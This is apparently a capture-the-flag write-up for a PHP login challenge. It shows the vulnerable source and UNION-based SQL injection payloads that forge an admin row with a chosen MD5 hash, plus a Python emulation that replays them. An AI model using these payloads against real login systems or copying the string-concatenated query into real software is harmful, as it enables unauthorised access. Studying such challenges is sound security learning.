The challenge presents a plain login form.
This is not an ordinary SQL injection challenge; it tests a property of MySQL UNION queries. The PHP handling the login:
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
// the username is concatenated straight into the query: this is the injection point
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
// the blocklist is checked only on the username, and only after the query has already run
if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        // echo '<pre>';
        // only the first row of the result set is ever looked at
        $arr = mysqli_fetch_row($result);
        // print_r($arr);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}
The property being exploited is that of UNION queries (see the referenced write-up). The filter rejects `(`, `)`, `=` and `or` in the username, so the usual `' or 1=1#` style payload is out, but `union` and `select` pass. If the WHERE clause matches no real user, the row supplied by UNION SELECT is the first (and only) row `mysqli_fetch_row` returns, and the application then compares against values we chose. The UNION must supply the same number of columns as the `user` table, three here.
So try entering:
Username: 1' union select 'admin',1,2#
Password: 123
The response is wrong user!, so the username is not the first column; it sits in the middle (index 1). Move 'admin' there:
Username: 1' union select 1,'admin',3#
Password: 123
Now the response is wrong pass!. For the last step, since the password we log in with is 123, the third column must be the MD5 of 123:
202cb962ac59075b964b07152d234b70
Username: 1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#
Password: 123
Submitting this returns the flag.
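The three probes above, replayed against a local emulation of the PHP logic. This is an added example and not code from the challenge: it builds an in-memory SQLite table `user(id, username, password)` with a constructed admin hash the attacker does not know, and a placeholder `FLAG`. SQLite does not accept `#` as a comment, so the payloads end in `-- ` instead; everything else (the concatenated query, the blocklist that runs after the query, the first-row-only check, the MD5 comparison) mirrors the PHP line for line.

```python
import hashlib
import re
import sqlite3

# Constructed stand-ins: the real admin hash is unknown to the attacker, and the flag is a placeholder.
ADMIN_REAL_HASH = hashlib.md5(b"some-unknown-admin-secret").hexdigest()
FLAG = "flag{placeholder}"

# Same blocklist as the PHP: preg_match("/\(|\)|\=|or/", $name)
BLOCKLIST = re.compile(r"\(|\)|=|or")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table user(id integer, username text, password text)")
    con.execute("insert into user values (1, 'admin', ?)", (ADMIN_REAL_HASH,))
    con.execute("insert into user values (2, 'guest', ?)", (md5_hex("guest"),))
    return con


def login(name: str, pw: str) -> str:
    """Emulates the challenge's PHP: deliberately vulnerable string concatenation."""
    con = make_db()
    sql = "select * from user where username = '" + name + "'"
    # PHP executes the query first and only then checks the blocklist; keep that order.
    row, err = None, None
    try:
        row = con.execute(sql).fetchone()  # mysqli_fetch_row: first row only
    except sqlite3.Error as e:
        err = str(e)
    if BLOCKLIST.search(name):
        return "do not hack me!"
    if err is not None:
        return "Error: " + err
    # $arr[1] == "admin": a NULL/absent row or a non-'admin' middle column fails here
    if row is None or row[1] != "admin":
        return "wrong user!"
    # md5($password) == $arr[2]: the injected row's third column is what we are compared against
    if md5_hex(pw) == row[2]:
        return FLAG
    return "wrong pass!"


# The write-up's three probes, with '-- ' as the SQLite comment terminator instead of '#'.
PROBE_WRONG_USER = "1' union select 'admin',1,2-- "
PROBE_WRONG_PASS = "1' union select 1,'admin',3-- "
PROBE_FLAG = "1' union select 1,'admin','" + md5_hex("123") + "'-- "

if __name__ == "__main__":
    for probe in (PROBE_WRONG_USER, PROBE_WRONG_PASS, PROBE_FLAG):
        print(repr(probe), "->", login(probe, "123"))
    # A classic boolean payload never reaches the query logic because of the blocklist.
    print(repr("' or 1-- "), "->", login("' or 1-- ", "x"))
```

The order of operations in `login` matters: because the blocklist runs after the query, a blocked payload still hits the database, but its result is never inspected, so the only path to the flag is a UNION row whose middle column is `admin` and whose third column equals the MD5 of whatever password you submit.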